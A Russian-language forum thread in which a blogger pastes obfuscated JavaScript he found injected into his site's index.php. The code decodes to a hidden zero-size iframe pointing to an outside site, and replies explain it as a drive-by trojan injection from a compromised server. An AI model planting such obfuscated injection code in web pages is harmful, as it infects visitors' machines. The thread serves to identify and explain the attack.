Вот есть у меня блог, и как то я заметил что он не открывается ну думаю. хостинг сломался, или ещё что, ан нет. несколько дней так не работал, ну я и забыл, заработался и т.п.
И тут мне знакомый говарит что зайдя на блог напоролся на троян или ещё что то которое подпортило винду, ну я мол не может быть и проверяю индекс.пхп (основной не шаблона) и о ужас вижу там вот такую песню:
<!-- ~ --><script language="JavaScript">cdata = Array (60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 99, 114, 97, 99, 107, 108, 97, 98, 46, 105, 110, 102, 111, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 32, 119, 105, 100, 116, 104, 61, 34, 48, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 48, 34, 32, 115, 116, 121, 108, 101, 61, 34, 100, 105, 115, 112, 108, 97, 121, 58, 110, 111, 110, 101, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62);for (i=0;i < 96;i++){document.write(String.fromCharCode(cdata[i]));}</script><!-- ~ -->Я конечно уже заменил индекс пхп на нормальный, но теперь просто интересно что это было? 🙂
Похоже на взлом сервера. Старая уже песня: обычно это происходит из-за слишком "открытого" сервера. Вражеский код добавляется в index.php. Обычно это скрытый iframe, ведущий на порноресурсы или сайты с троянами и вирусами. В последнем случае браузер автоматом предлагает сохранить exe-файл. Хотя дырявый IE может может сразу же его запустить.
А как от этого уберечься ?
Например запретить на сервере команду chmod. Но вообще это проблемы админа сервера.